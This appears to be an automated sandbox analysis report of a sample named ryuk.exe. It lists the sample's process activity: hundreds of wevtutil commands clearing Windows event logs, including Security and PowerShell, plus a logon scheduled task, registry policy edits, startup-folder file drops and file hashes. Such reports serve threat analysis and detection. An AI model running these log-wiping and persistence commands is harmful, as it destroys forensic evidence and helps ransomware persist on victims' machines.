wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RPC/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Sens/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TunnelDriver"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UAC/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WFP/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Power"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Render"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ntshrui"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "OAlerts"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Security"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Setup"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "System"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "TabletPC_InputPanel_Channel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WMPSetup"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WMPSyncEngine"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Windows PowerShell"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "muxencode"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f

Network

N/A

Files

C:\ProgramData\ryuk.exe

MD5 6a5bf25ff4f72ebca91280ffda057260
SHA1 722063331acdbfc93ccbfacbec045800a835dd9e
SHA256 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 6a5bf25ff4f72ebca91280ffda057260
SHA1 722063331acdbfc93ccbfacbec045800a835dd9e
